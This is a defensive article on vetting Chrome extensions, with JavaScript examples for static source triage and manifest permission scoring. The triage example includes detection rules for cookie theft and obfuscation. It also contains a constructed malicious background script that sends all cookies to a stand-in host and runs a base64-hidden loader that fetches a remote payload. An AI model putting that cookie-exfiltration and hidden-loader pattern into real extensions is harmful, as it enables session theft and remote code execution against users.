Google Chrome Extension Security Check
Chrome extensions can have access to a user's sensitive data: an extension with broad permissions runs alongside every page the user visits. Extensions are also targets in their own right; a legitimate extension can be compromised, for instance when its developer account or update channel is taken over, and then pushed to every existing user as an update.
During the installation workflow, many users grant permissions to an extension without much consideration. This is why it is crucial for IT teams to evaluate the risk of every extension before allowing them on their managed devices.
Check for Vulnerabilities
Chrome extensions are small plugin apps that reside inside the browser and extend its capabilities. They can add a wide variety of functionality to Google Chrome, such as password management, bookmark storage and translation services. But an extension with broad permissions sits between the user and every site they visit, and a malicious or compromised one can read page content, form input and cookies and send them to a server of its choosing.
A good first step is to check the developer's legitimacy and read the listing on the Chrome Web Store. The listing's Permissions and Privacy practices sections should match what the extension claims to do and should state whether it collects or transfers data to external servers. The authoritative list, however, is the extension's manifest.json (the permissions, host_permissions and content script match patterns), which Chrome summarizes in the install prompt and at chrome://extensions. Comparing that list with the stated purpose lets you judge the risk of the extension's functionality and decide whether to grant it access.
Check for Injections
The Chrome Web Store vets extensions for security issues before they are approved. But review is not a guarantee: malicious extensions regularly pass it, and an extension that was clean at review time can turn malicious in a later update.
Once a malicious extension is installed, it can do anything from collecting browsing data to stealing user credentials. This is why teams should review extensions regularly, not just at first install but again after updates are pushed out.
One of the best ways to evaluate whether an extension is safe is to read its source code. The .crx package is a ZIP archive with a short header, so its contents can be unpacked and inspected; the installed copy also sits unpacked in the Chrome profile directory. Reading the code reveals risky or dangerous snippets that may expose users to malware and phishing, and it lets teams judge whether the extension's permission level is appropriate for their environment. Duo Labs has released a tool that automates this review and scans the full Chrome Web Store on an ongoing basis: CRXcavator. Duo is proud to partner with Google as a Chrome Enterprise customer to bring this tool to life and make it easier for teams to stay on top of their extensions.
Check for Cross-site Scripting
Extensions accumulate permissions over time, and the more they hold the more important it is that they do not quietly read or leak data. An extension whose content scripts match every site injects its own JavaScript into each page the user visits, with access to that page's DOM and to anything typed into it, so the match patterns deserve the same scrutiny as the API permissions.
It is also worth checking whether the extension has a professionally made website, which lends credibility and gives you somewhere to look for further details. In the code, look for downloads built from blob: URLs: an extension that assembles a file in memory and hands it to the user holds the full contents of that file, a PDF for instance, and can just as easily send it elsewhere.
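A first pass over an extension's source, as an added example that is not CRXcavator and not code from any real extension: it turns the reviewer's checklist (dynamic code, cookie access, request hooks, blob: downloads, runtime string decoding) into line-level regex rules, lists the hosts the code contacts, and decodes base64 literals so hosts hidden behind atob() show up too. The background script it scans is a constructed sample written for this example.

```javascript
// Added example: static triage of an unpacked extension's JavaScript.
// Rules are deliberately simple text patterns; each hit is reported with its
// line so a reviewer reads it in context instead of trusting the label.
const RULES = [
  { id: 'dynamic-code',  re: /\beval\s*\(|\bnew\s+Function\s*\(/,
    why: 'runs code that is not in the bundle you reviewed' },
  { id: 'cookie-access', re: /document\.cookie|chrome\.cookies\./,
    why: 'reads session cookies, the raw material for account takeover' },
  { id: 'traffic-hook',  re: /chrome\.webRequest\b|chrome\.declarativeNetRequest\b/,
    why: 'can observe or rewrite every request the browser makes' },
  { id: 'debugger-api',  re: /chrome\.debugger\b/,
    why: 'attaches the DevTools protocol to tabs, giving full page control' },
  { id: 'blob-url',      re: /URL\.createObjectURL\s*\(|["'`]blob:/,
    why: 'assembles a file in memory; check what goes into it and where it is sent' },
  { id: 'obfuscation',   re: /\batob\s*\(|String\.fromCharCode\s*\(/,
    why: 'decodes strings at runtime, hiding hosts and logic from a text search' },
  { id: 'keystrokes',    re: /addEventListener\s*\(\s*["']key(down|press|up)["']/,
    why: 'keystroke listeners on arbitrary pages are a keylogger primitive' },
];

// One finding per (line, rule), in file order.
function scanSource(file, source) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) {
        findings.push({ file, line: i + 1, rule: rule.id, why: rule.why, snippet: text.trim() });
      }
    }
  });
  return findings;
}

// Hosts named in http(s) URL string literals: where the extension talks to.
function externalHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/["'`](https?:\/\/[^"'`\s]+)/g)) {
    try { hosts.add(new URL(m[1]).host); } catch (_) { /* unparseable literal, skip */ }
  }
  return [...hosts].sort();
}

// Decode every atob('...') literal so hosts hidden behind base64 are visible.
function decodedLiterals(source) {
  const out = [];
  for (const m of source.matchAll(/\batob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g)) {
    out.push(Buffer.from(m[1], 'base64').toString('utf8'));
  }
  return out.join('\n');
}

function reviewSource(file, source) {
  return {
    findings: scanSource(file, source),
    hosts: externalHosts(source),
    hiddenHosts: externalHosts(decodedLiterals(source)),
  };
}

// Constructed sample (not a real extension): a "PDF tools" background script
// that also ships cookies to a remote host and executes code decoded at runtime.
const SAMPLE_BACKGROUND_JS = `
chrome.runtime.onInstalled.addListener(() => console.log('pdf tools ready'));
chrome.cookies.getAll({}, (cookies) => {
  fetch('https://telemetry.example.net/c', { method: 'POST', body: JSON.stringify(cookies) });
});
const loader = atob('ZmV0Y2goJ2h0dHBzOi8vY2RuLmV4YW1wbGUuY29tL3BheWxvYWQuanMnKQ==');
new Function(loader)();
function exportPdf(bytes) {
  const url = URL.createObjectURL(new Blob([bytes], { type: 'application/pdf' }));
  chrome.downloads.download({ url, filename: 'export.pdf' });
}
`;

const report = reviewSource('background.js', SAMPLE_BACKGROUND_JS);
for (const f of report.findings) console.log(`${f.file}:${f.line} [${f.rule}] ${f.snippet}  // ${f.why}`);
console.log('contacts:', report.hosts, 'hidden behind base64:', report.hiddenHosts);
```

On the sample this reports the cookie read, the atob() call, the new Function() call and the blob: download, names telemetry.example.net as a contacted host, and surfaces cdn.example.com only after decoding the base64 literal. A plain text search for URLs would have missed that second host, which is exactly why obfuscated string literals are a finding in their own right.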
Check for Malware
Extensions often ask for a wide range of permissions to function. A prudent enterprise security team would evaluate every permission request before allowing the user to finish the extension install flow. But the reality is that this type of review is impractical for most organizations.
An extension's functionality can change over time: an update pushed through a compromised developer account, or by a new owner after the extension changes hands, can introduce malware or risky code. This is one reason Duo Labs recommends checking an extension's reviews and source code before installing it, and again after updates.
Chrome 117 includes a new feature that alerts users when an extension they previously installed has been unpublished by its developer, taken down for violating Chrome Web Store policies, or marked as malware. This is a useful tool for keeping the browser and its extensions free of malware. It is also a reminder to review existing extensions regularly and remove ones that are no longer maintained, since an abandoned extension will not receive fixes for the vulnerabilities found in it.
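Turning the permission review described above (the listing check and the manifest comparison, and the per-permission evaluation this section says most teams cannot do by hand) into a repeatable check, as an added example that is neither CRXcavator nor code from Duo or Google: it reads a manifest.json, weights the API permissions, flags host patterns that cover every site, and applies an organization blocklist to reach a verdict. The weights, the thresholds, the policy and the three manifests are illustrative assumptions constructed for this example. It also covers the Manifest V2 layout, where host patterns sat in permissions rather than host_permissions, which the text does not mention.

```javascript
// Added example: scoring declared permissions from manifest.json.
// Weights and thresholds are assumptions a team would tune for its own environment.
const PERMISSION_WEIGHT = {
  debugger: 10, nativeMessaging: 8, webRequest: 7, webRequestBlocking: 7, proxy: 7,
  cookies: 6, history: 5, tabs: 4, clipboardRead: 4, scripting: 4, declarativeNetRequest: 3,
  downloads: 3, management: 3, storage: 1, alarms: 0, notifications: 0, contextMenus: 0,
};

// Match patterns that put the extension on every site the user visits.
function isBroadHostPattern(p) {
  return p === '<all_urls>' || /^\*:\/\/\*\//.test(p) || /^https?:\/\/\*\//.test(p);
}

// MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
function splitPermissions(manifest) {
  const declared = manifest.permissions || [];
  const looksLikeHost = (p) => p.includes('://') || p === '<all_urls>';
  const api = declared.filter((p) => !looksLikeHost(p));
  const hosts = [...(manifest.host_permissions || []), ...declared.filter(looksLikeHost)];
  const contentScriptMatches = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  return { api, hosts, contentScriptMatches };
}

function assessManifest(manifest, policy = { blockedPermissions: [], allowBroadHosts: false }) {
  const { api, hosts, contentScriptMatches } = splitPermissions(manifest);
  const reasons = [];
  let score = 0;
  for (const p of api) {
    const w = PERMISSION_WEIGHT[p] ?? 2; // unknown permission: assume moderate
    score += w;
    if (w >= 5) reasons.push(`permission ${p} (weight ${w})`);
    if (policy.blockedPermissions.includes(p)) reasons.push(`permission ${p} is blocked by policy`);
  }
  const broad = [...new Set([...hosts, ...contentScriptMatches].filter(isBroadHostPattern))];
  if (broad.length) {
    score += 10;
    reasons.push(`runs on every site: ${broad.join(', ')}`);
  }
  const blocked = api.some((p) => policy.blockedPermissions.includes(p))
    || (broad.length > 0 && !policy.allowBroadHosts);
  const verdict = blocked ? 'deny' : score >= 10 ? 'manual-review' : 'allow';
  return { score, verdict, reasons, api, hosts: [...new Set([...hosts, ...contentScriptMatches])] };
}

// Constructed manifests (not real extensions) and an illustrative org policy.
const BOOKMARK_HELPER = { manifest_version: 3, name: 'Bookmark Helper', permissions: ['storage', 'bookmarks'] };
const PDF_TOOLS = {
  manifest_version: 3, name: 'PDF Tools',
  permissions: ['cookies', 'webRequest', 'tabs', 'storage', 'downloads'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['*://*/*'], js: ['content.js'] }],
};
const MV2_TRANSLATOR = { manifest_version: 2, name: 'Translator', permissions: ['storage', 'https://*/*'] };
const ORG_POLICY = { blockedPermissions: ['debugger', 'nativeMessaging', 'webRequest'], allowBroadHosts: false };

for (const m of [BOOKMARK_HELPER, PDF_TOOLS, MV2_TRANSLATOR]) {
  const r = assessManifest(m, ORG_POLICY);
  console.log(`${m.name}: ${r.verdict} (score ${r.score})`, r.reasons);
}
```

The bookmark helper scores low and is allowed; the PDF tools manifest is denied both because webRequest is on the blocklist and because it runs on every site; the MV2 translator only needs a storage permission but its https://*/* pattern still puts it on every page, so with broad hosts permitted by policy it lands in manual review rather than being waved through. Feeding the verdict into the ExtensionSettings enterprise policy is the natural next step, but that mapping is left to the reader.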